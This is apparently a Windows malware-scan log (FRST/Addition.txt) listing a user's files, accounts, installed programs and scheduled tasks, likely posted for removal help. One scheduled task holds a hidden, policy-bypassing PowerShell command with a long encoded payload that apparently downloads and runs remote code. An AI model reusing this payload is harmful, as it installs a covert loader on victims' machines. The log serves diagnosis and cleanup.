2015-12-07 03:29 - 2009-07-14 10:54 - 00000000 ____D C:\Program Files\Windows Journal
2015-12-02 13:18 - 2014-05-23 16:14 - 00301728 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe

==================== Files in the root of some directories =======

2014-09-06 19:36 - 2014-09-06 19:36 - 1177208 _____ () C:\Users\Simon\AppData\Roaming\AndyCleanupTool.exe
2014-09-06 19:36 - 2014-09-06 19:36 - 1176696 _____ () C:\Users\Simon\AppData\Roaming\AndyCleanVM.exe
2014-12-02 19:05 - 2015-06-29 19:41 - 0001456 _____ () C:\Users\Simon\AppData\Local\Adobe Save for Web 13.0 Prefs
2015-05-30 13:19 - 2015-12-26 02:11 - 0000000 _____ () C:\Users\Simon\AppData\Local\Driver_LOM_8161Present.flag
2015-05-18 15:37 - 2015-05-18 15:37 - 0007597 _____ () C:\Users\Simon\AppData\Local\Resmon.ResmonCfg
2015-04-13 22:45 - 2015-04-14 02:01 - 0011710 _____ () C:\Users\Simon\AppData\Local\Temp-log.txt

==================== Bamital & volsnap =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2015-12-25 22:58

==================== End of FRST.txt ============================

Addition:

Additional scan result of Farbar Recovery Scan Tool (x64) Version:25-12-2015
Ran by Simon (2015-12-26 15:58:13)
Running from C:\Users\Simon\Downloads
Windows 7 Professional Service Pack 1 (X64) (2014-05-20 18:13:56)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-1743091598-2114630970-4208458173-500 - Administrator - Disabled)
Gjest (S-1-5-21-1743091598-2114630970-4208458173-501 - Limited - Disabled)
Simon (S-1-5-21-1743091598-2114630970-4208458173-1000 - Administrator - Enabled) => C:\Users\Simon

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Adobe Creative Cloud (HKLM-x32\...\Adobe Creative Cloud) (Version: 2.7.1.418 - Adobe Systems Incorporated)
Adobe Flash Player 20 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 20.0.0.235 - Adobe Systems Incorporated)
Adobe Illustrator CC (HKLM-x32\...\{F2321021-08A2-44D6-B1DF-BDB415F23EC3}) (Version: 17.0 - Adobe Systems Incorporated)
Adobe Photoshop CS6 (HKLM-x32\...\Adobe Photoshop CS6) (Version: 13.0.0.0 - © The Computer Guy Tony)
Adobe Premiere Pro CC 2014 (HKLM-x32\...\{07BE616F-9E42-4C90-AF4F-0F32A5B088E7}) (Version: 8.0.1 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.11) - Norsk (HKLM-x32\...\{AC76BA86-7AD7-1044-7B44-AB0000000001}) (Version: 11.0.11 - Adobe Systems Incorporated)
Bandicam (HKLM-x32\...\Bandicam) (Version: 2.1.0.708 - Bandisoft.com)
Bandisoft MPEG-1 Decoder (HKLM-x32\...\BandiMPEG1) (Version:  - Bandisoft.com)
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
Box Edit (HKLM-x32\...\{145BEAC3-F9E4-432B-AFD3-D36216C4C355}) (Version: 3.0.24.493 - Box)
CCleaner (HKLM\...\CCleaner) (Version: 5.04 - Piriform)
Cisco EAP-FAST Module (HKLM-x32\...\{64BF0187-F3D2-498B-99EA-163AF9AE6EC9}) (Version: 2.2.14 - Cisco Systems, Inc.)
Cisco LEAP Module (HKLM-x32\...\{AF312B06-5C5C-468E-89B3-BE6DE2645722}) (Version: 1.0.19 - Cisco Systems, Inc.)
Cisco PEAP Module (HKLM-x32\...\{0A4EF0E6-A912-4CDE-A7F3-6E56E7C13A2F}) (Version: 1.1.6 - Cisco Systems, Inc.)
Counter-Strike: Global Offensive (HKLM-x32\...\Steam App 730) (Version:  - Valve)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
ETDWare PS/2-X64 11.13.6.2_WHQL (HKLM\...\Elantech) (Version: 11.13.6.2 - ELAN Microelectronic Corp.)
Fotogalleri (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Garry's Mod (HKLM-x32\...\Steam App 4000) (Version:  - Facepunch Studios)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 47.0.2526.106 - Google Inc.)
Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.29.1 - Google Inc.) Hidden
Gyazo 3.1.6 (HKLM-x32\...\{6DB8C365-E719-4BA5-9594-10DFC244D3FD}_is1) (Version:  - Nota Inc.)
Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 9.5.15.1730 - Intel Corporation)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.3412 - Intel Corporation)
Intel(R) Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 12.8.2.1000 - Intel Corporation)
Intel(R) USB 3.0 eXtensible Host Controller Driver (HKLM-x32\...\{240C3DDD-C5E9-4029-9DF7-95650D040CF2}) (Version: 2.5.3.34 - Intel Corporation)
Intel® PROSet/Wireless-programvare (HKLM-x32\...\{105fa5c4-72e1-41f2-a82c-884d8aa4b381}) (Version: 16.6.0 - Intel Corporation)
Java 7 Update 67 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83217055FF}) (Version: 7.0.670 - Oracle)
Junk Mail filter update (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
K-Lite Codec Pack 10.6.5 Basic (HKLM-x32\...\KLiteCodecPack_is1) (Version: 10.6.5 - )
Malwarebytes Anti-Malware versjon 2.2.0.1024 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.2.0.1024 - Malwarebytes)
Microsoft .NET Framework 4.5.2 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.51209 - Microsoft Corporation)
Microsoft ASP.NET MVC 4 Runtime (HKLM-x32\...\{3FE312D5-B862-40CE-8E4E-A6D8ABF62736}) (Version: 4.0.40804.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft XNA Framework Redistributable 4.0 (HKLM-x32\...\{2BFC7AA0-544C-4E3A-8796-67F3BE655BE9}) (Version: 4.0.20823.0 - Microsoft Corporation)
Movie Maker (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Mozilla Firefox 43.0.2 (x86 nb-NO) (HKLM-x32\...\Mozilla Firefox 43.0.2 (x86 nb-NO)) (Version: 43.0.2 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 43.0.2 - Mozilla)
MSI Afterburner 4.1.0 (HKLM-x32\...\Afterburner) (Version: 4.1.0 - MSI Co., LTD)
MSI Fast Boot (HKLM-x32\...\{0F212E7A-65EB-4668-A8D7-749026A64F8E}_is1) (Version: 1.0.1.8 - MSI)
Notepad++ (HKLM-x32\...\Notepad++) (Version: 6.6.9 - Notepad++ Team)
NVIDIA GeForce Experience 2.2.2 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 2.2.2 - NVIDIA Corporation)
NVIDIA Grafikkdriver 347.25 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 347.25 - NVIDIA Corporation)
NVIDIA PhysX systemprogramvare 9.14.0702 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.14.0702 - NVIDIA Corporation)
OpenOffice 4.1.1 (HKLM-x32\...\{FBEB2D26-74E6-4DEE-B6CE-0EB3B92DE777}) (Version: 4.11.9775 - Apache Software Foundation)
Oracle VM VirtualBox 4.3.12 (HKLM\...\{B5121457-0126-4E62-BCBF-6DC7C73D9E4A}) (Version: 4.3.12 - Oracle Corporation)
PDF Settings CC (x32 Version: 12.0 - Adobe Systems Incorporated) Hidden
Qualcomm Atheros Bandwidth Control Filter Driver (Version: 1.1.42.1045 - Qualcomm Atheros) Hidden
Qualcomm Atheros Killer E220x Drivers (Version: 1.1.42.1045 - Qualcomm Atheros) Hidden
Qualcomm Atheros Network Manager (Version: 1.1.42.1045 - Qualcomm Atheros) Hidden
Qualcomm Atheros Performance Suite (HKLM-x32\...\{E70DB50B-10B4-46BC-9DE2-AB8B49E061EE}) (Version: 1.1.42.1045 - Qualcomm Atheros)
Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 6.3.9600.21249 - Realtek Semiconductor Corp.)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7179 - Realtek Semiconductor Corp.)
REALTEK Wireless LAN Driver (HKLM-x32\...\{9DAABC60-A5EF-41FF-B2B9-17329590CD5}) (Version: 1.00.0235 - REALTEK Semiconductor Corp.)
SHIELD Streaming (Version: 4.0.1000 - NVIDIA Corporation) Hidden
SHIELD Wireless Controller Driver (Version: 17.12.8 - NVIDIA Corporation) Hidden
Skype Click to Call (HKLM-x32\...\{6D1221A9-17BF-4EC0-81F2-27D30EC30701}) (Version: 7.5.0.9082 - Microsoft Corporation)
Skype™ 7.0 (HKLM-x32\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 7.0.102 - Skype Technologies S.A.)
Spotify (HKU\S-1-5-21-1743091598-2114630970-4208458173-1000\...\Spotify) (Version: 1.0.20.94.g8f8543b3 - Spotify AB)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
Team Fortress 2 (HKLM-x32\...\Steam App 440) (Version:  - Valve)
TeamSpeak 3 Client (HKLM\...\TeamSpeak 3 Client) (Version: 3.0.16 - TeamSpeak Systems GmbH)
The Enigma Protector v4.40 Build 20150619 (HKLM-x32\...\The Enigma Protector x64_is1) (Version:  - The Enigma Protector Developers Team)
Tixati (HKLM-x32\...\tixati) (Version:  - )
VLC media player (HKLM-x32\...\VLC media player) (Version: 2.1.5 - VideoLAN)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3528.0331 - Microsoft Corporation)
WinRAR 5.01 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.01.0 - win.rar GmbH)
XSplit Gamecaster (HKLM-x32\...\{192BAAFE-0440-45C5-8E9C-FA6F8581EC8F}) (Version: 1.5.1401.2102 - SplitMediaLabs)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {09243C41-78C6-4705-8A44-74ADF37148A0} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-12-25] (Google Inc.)
Task: {15DCE0F0-4638-4ED2-8AE8-E66A1F6E8071} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
Task: {204D1C36-0B82-472C-9C74-22463EC1EE14} - System32\Tasks\Norton Internet Security\Norton Error Analyzer => C:\Program Files (x86)\Norton Internet Security\Engine\21.0.0.100\SymErr.exe
Task: {2082BF41-00C5-4D3E-96FC-2E0BE3811523} - System32\Tasks\AdobeAAMUpdater-1.0-Simon-PC-Simon => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe
Task: {3DBE0C46-2759-4AD2-B89E-6C57BF404C98} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2015-03-13] (Piriform Ltd)
Task: {48E19AF3-2DD9-4715-A5DA-EF87694CDB2A} - System32\Tasks\{B9242E84-7B66-4DAB-9F83-6C1F55A37D6E} => pcalua.exe -a E:\Autorun.exe -d E:\
Task: {55749066-36D7-4CAF-88BF-B6CB1C3EF9EE} - System32\Tasks\{353FBC57-6237-441C-B63B-98BC2D9D416F} => pcalua.exe -a E:\CDSetup.exe -d E:\
Task: {6D238D9B-024B-4127-95BE-82B7AA15D31D} - System32\Tasks\{9C7E7CD6-234F-42F0-A024-3B1422CA0E10} => Firefox.exe hxxp://ui.skype.com/ui/0/7.4.0.102/no/abandoninstall?page=tsProgressBar
Task: {7F87DC8C-6CDF-4B37-BCB4-18B00E818746} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-12-25] (Google Inc.)
Task: {883668A6-F707-4DDF-A886-505891E36532} - System32\Tasks\GyazoUpdateTaskMachineDaily => C:\Program Files (x86)\Gyazo\GyazoUpdate.exe [2015-08-19] ()
Task: {8ED8F4F8-4365-4431-AA39-7536BCA6F5A1} - System32\Tasks\{6D9AE6C4-E019-018C-C9B4-9E2714B48E10} => powershell.exe -windowstyle hidden -noninteractive -ExecutionPolicy bypass -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFYAZQByAGIAbwBzAGUAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsAJABEAGUAYgB1AGcAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsACgBmAHUAbgBjAHQAaQBvAG4AIABzAHIAKAAkAHAAKQB7ACQAbgA9ACIAVwBpAG4AZABvAHcAUABvAHMAaQB0AGkAbwBuACIAOwB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAcAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0AYwBhAHQAYwBoAHsAfQB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAE8AUgBEACAALQBWAGEAbAB1AGUAIAAyADAAMQAzADIAOQA2ADYANAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0ACgBjAGEAdABjAGgAewB0AHIAeQB7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFYAYQBsAHUAZQAgADIAMAAxADMAMgA5ADYANgA0AHwATwB1AHQALQBOAHUAbABsADsAfQBjAGEAdABjAGgAewB9AH0AfQBzAHIAKAAiAEgASwBDAFUAOgBcAEMAbwBuAHMAbwBsAGUAXAAlAFMAeQBzAHQAZQBtAFIAbwBvAHQAJQBfAFMAeQBzAHQAZQBtADMAMgBfAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABfAHYAMQAuADAAXwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAJQBTAHkAcwB0AGUAbQBSAG8AbwB0ACUAXwBTAHkAcwB0AGUAbQAzADIAXwBzAHYAYwBoAG8AcwB0AC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAdABhAHMAawBlAG4AZwAuAGUAeABlACIAKQA7AAoAJABzAHUAcgBsAD0AIgBoAHQAdABwADoALwAvAHMAcABvAHIAdABuAGUAdwAuAG4AZQB0AC8AdQAvAD8AcQA9AEEAQQBkADIAegBmAEgAdABJAFgASQBJADkAdgA0AFgAcQBJAGYAXwBUAE8ARABWAFYAQgBUAFQAOAAzAEsAaQBhAFIAMgAyAHIAYgB2AE8ASgBRAFYAawBrAEcAdwBVAGkAZQBBAGUAdwB5ADIAVABrAEoAdABNAHAAdABaAFoASwBGAGwAQgBFADIAeQBYAEUAeQAwAGIAeABOAC0ATQAxAEkAVABQAGEAQgBnAEoAYgBKAGIAeABiADgASgBoADYAUQBhAE8AVABhAGgANABSAHYAeABrAHgAdABRAG0AcQA0ADgASgBMADkAWQAtAEkAVQBMAGcAdABuAF8AYwBXAG8ARgBGAGwANgBfAHUASwBwAHMARABLADYAcwBkAHIAUgBwAFcAWABRADgAdgB3AFoAcABxAHMAYwBzAFQARQBaAFcATABOADkAVwA1AEMAdgA4ADEAQgA1AE0AOQBnAFgAWAA4AFQANAAxAFcAWABoAHMARwBhAHoANQBYAFYASgB5AGYAMgBpAHAAMwB0AHEAMwBtADcASwBUAHEAMwBKAEkARwAzADIAegBGAG4AdgBiAG8AYwBTAHgAOQBIAGkASwBtAGMAZgBYAEYAUAAyAGgATgBMAHgAdgBiAEUAcgB1AFYARQB2AHkANQBJAFUATABwAHUATAAzAGMAZwByAFIAbgBrADAAawBEAGIAcQBSAF8AVAB6AHYAWQA3AE8AXwBtAG8AUABtAEUANQBlAGUAawBUAFUAOQA4ADgAegBOAFEAXwA1AGQAWgA4AE8ATABqAFUATQBDADMAdABFAE0AdwBaAFkAVQB6AGwAUwBiAFkAYwAwAHgAQwBTAGgAZQBQAGoAVAB2AHQAWABxAFcATgBhAHYAagA1AGkANgBsAHcAUwBfAG8AegBMAFMAaABsAE8AaABtAEMAbABzAFAARgA1AGUAWgBnADMANgBtAEEATwB3AGYARgAwAG8AYwB1AFMAeABXAEIAegBZAEoAdgBEAFgAUgBWAG4AcgBFADgAMABnAHEAWABDAGkAdwA0AGcAYQB5AFQAVgBHAEUAZAB1AHcASgByAFEAYQBRAHAAbQBXAHoAUwBMAEEAXwBIAF8ATQBIAEsARABPAFYAawBhADkAVABEADgAMABsAG4AcwBMAEEARgBlAHkAZABVADQAeQA4AGsAUABqADMAQwBfADUAVwBKAEEANwA4AG0AJgBjAD0AUwBCAFQAZgBxAGwAMQAxAFIAVwB1AEkANgBlAHAAdABJAHQAcwBXAEUAbQBjAHQASQBMAFgARwBoAGIAcAB0ADMAawBpAGUAYQBZAGMAMwBKAEsAbwBBAEYAUwBSAE4ATABxAEkANwBPAFcAcwBTAGgAMgBiAGQARgA0AGEANABtAHUAaABSAFMANABDAGUALQBtAEgAQQBiADkAVQBEAF8ASwBwADUAaABTAEIAcwB0AFAAdQBRAEwAdgBsAHcATgBRADYAOQB5AHQAOAB1AGUAYgBwAGUAUAAzAHYASABnAGUAXwBlAHEAWgAzAEMAWgBwAC0AQwBTAFoAUAB6AFkAawBPAHUAMwB3AG4AdgBsAFUAcAAtAFAATgBtADIAOQBXAGIAegBEAEIAcQBVAEQAbABlAF8ANgA4AG4AOQBDADAASQA3ADkASwBZAEwANgB6AF8AZgBXADYAaABmAFYARAA4ADQAbwAzADgAZABFADMAVwB4AGsAdAA1AEQAQgBCAE8AUgBMADUAZgA3AHcAVABSAHIARQA1AGMANgBFADIARQBjAFoAbAA5AEkAdQBuADYARQBZAEUAOAAzADgAbwBwAFcAcQBoAE4AZgBuADEAVwBpAFoASAA1AEwAXwBMAHgAcgBCAGcAUAAzAEgANQBCAEkAYgB1ADEARQBwAGUAZQBJAGYAMQAzAEEANQAtAEsAcQBGAEcAZABFAFYAQgBUAEwAeABXAFQAMwB4AGMARwBPAEoASQAxAGgATwBpADAAWgBiAGwAYgBpAHIAWQBYADgATAA3AEIAUQBVAHkAdgBZAFQAcQBOAHgANQBnAFkAaABwAFEAbwBIADAAcABlAEkAUABKAHoATgBCAHEAZwBtAEEAOQBOAFIAVAB0AEYAcgBiAFAASgAzAEQAWgBWAEoAcQBWAGUAWgAwAE8AYQBHAFcAMgAyAFgAcQBDAGUAYwBWAFcAVgBDAGIALQBvAHMANwAzAGQARgBuAGsAbQBEAHkARgBnAFEAcABvAGMAYwByAEEASQBNAEEAVQBZAHIAUgBBAGoAdwByAEkAcgBkADgAUAA1AGIATAB2AFIANwBOAGgAVABQADAAQgAyAFkAYgBGAEIAQQA2ADUAWQBvAF8AMQBGAFkAdQBhADMARgBqAHQAbQBqAHIATABHADUAVwBxAFcAaAByAFMAYgBWAEwANQBfAFcAeQBhAHUAeABsADUAcgBUADEAcwBKAEYANAAwAEsAbABfAEsAawBBAGsAbABMADUAbgAwAEMAegA5AC0AdQBvAEsAWABNADIAUgB2AHYAMgBnAEMAUgA0AHUARABXAEQAZgBFAFoAYwBJAHAAaQBKAGUAcgBPAGgAXwBBAFoATwBwAHEAaQB6AHIAUgBaAEoAagBaAGsAUwBvAGwAOQBGADEAWABGAGsAUABmAG4AZwBDAHAAZQA0AF8AaQBNAHoAMwBPAHQATAA3AEIAMAB4ADEAZgBVADMAUgBmAFIAVgBGAFIAdABHAHkAagBCADUAbgBoADAAZwA2AGIANgBjAHgAagA0AGkAQgAtAG0AeABPAHAAWgBlADgAdgBpAGEANwBIAFEAMABRAGcARgBWAE4AYQAtADYAVgA0AEsAdgBpAEkAMgBqAEYASAAwAEQAZABxAEcAUgBBAGUATABmAGUATgBJAE4AcABsAFIAVQByAFQAZwBvAHIAdQBaAEcASgBCAGUALQB4AEIATwA1AGQAOQByADkAdgAzADAAdABWAEEAbABRAEIAZABxAFQALQA4AEUAJgByAD0AMQA5ADYAOQA2ADUANAAxADQAOQAwADMAOQAzADIAMAAxADUAMAAiADsAJABzAHQAcwBrAD0AIgB7ADYARAA5AEEARQA2AEMANAAtAEUAMAAxADkALQAwADEAOABDAC0AQwA5AEIANAAtADkARQAyADcAMQA0AEIANAA4AEUAMQAwAH0AIgA7ACQAcAByAGkAZAA9ACIARABUACIAOwAkAGkAbgBpAGQAPQAiADAAIgA7AHQAcgB5AHsAaQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AbAB0ACAAMgApAHsAYgByAGUAYQBrADsAfQAkAHYAPQBbAFMAeQBzAHQAZQBtAC4ARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AE8AUwBWAGUAcgBzAGkAbwBuAC4AVgBlAHIAcwBpAG8AbgA7AAoAaQBmACgAJAB2AC4ATQBhAGoAbwByACAALQBlAHEAIAA1ACkAewBpAGYAKAAoACQAdgAuAE0AaQBuAG8AcgAgAC0AbAB0ACAAMgApACAALQBBAE4ARAAgACgAKABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAAVwBpAG4AMwAyAF8ATwBwAGUAcgBhAHQAaQBuAGcAUwB5AHMAdABlAG0AKQAuAFMAZQByAHYAaQBjAGUAUABhAGMAawBNAGEAagBvAHIAVgBlAHIAcwBpAG8AbgAgAC0AbAB0ACAAMgApACkAewBiAHIAZQBhAGsAOwB9AH0ACgBpAGYAKAAtAE4ATwBUACAAKABbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBQAHIAaQBuAGMAaQBwAGEAbABdAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAEkAZABlAG4AdABpAHQAeQBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0ACgAKQApAC4ASQBzAEkAbgBSAG8AbABlACgAWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMAQgB1AGkAbAB0AEkAbgBSAG8AbABlAF0AIAAiAEEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAIgApACkAewBiAHIAZQBhAGsAOwB9AAoAZgB1AG4AYwB0AGkAbwBuACAAdwBjACgAJAB1AHIAbAApAHsAJAByAHEAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAByAHEALgBVAHMAZQBEAGUAZgBhAHUAbAB0AEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA9ACQAdAByAHUAZQA7ACQAcgBxAC4ASABlAGEAZABlAHIAcwAuAEEAZABkACgAIgB1AHMAZQByAC0AYQBnAGUAbgB0ACIALAAiAE0AbwB6AGkAbABsAGEALwA0AC4AMAAgACgAYwBvAG0AcABhAHQAaQBiAGwAZQA7ACAATQBTAEkARQAgADcALgAwADsAIABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwApACIAKQA7AHIAZQB0AHUAcgBuACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAHIAcQAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJAB1AHIAbAApACkAOwB9AAoAZgB1AG4AYwB0AGkAbwBuACAAZABzAHQAcgAoACQAcgBhAHcAZABhAHQAYQApAHsAJABiAHQAPQBbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAcgBhAHcAZABhAHQAYQApADsAJABlAHgAdAA9ACQAYgB0AFsAMABdADsAJABrAGUAeQA9ACQAYgB0AFsAMQBdACAALQBiAHgAbwByACAAMQA3ADAAOwBmAG8AcgAoACQAaQA9ADIAOwAkAGkAIAAtAGwAdAAgACQAYgB0AC4ATABlAG4AZwB0AGgAOwAkAGkAKwArACkAewAkAGIAdABbACQAaQBdAD0AKAAkAGIAdABbACQAaQBdACAALQBiAHgAbwByACAAKAAoACQAawBlAHkAIAArACAAJABpACkAIAAtAGIAYQBuAGQAIAAyADUANQApACkAOwB9AAoAcgBlAHQAdQByAG4AKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARABlAGYAbABhAHQAZQBTAHQAcgBlAGEAbQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgAJABiAHQALAAyACwAKAAkAGIAdAAuAEwAZQBuAGcAdABoAC0AJABlAHgAdAApACkAKQAsAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7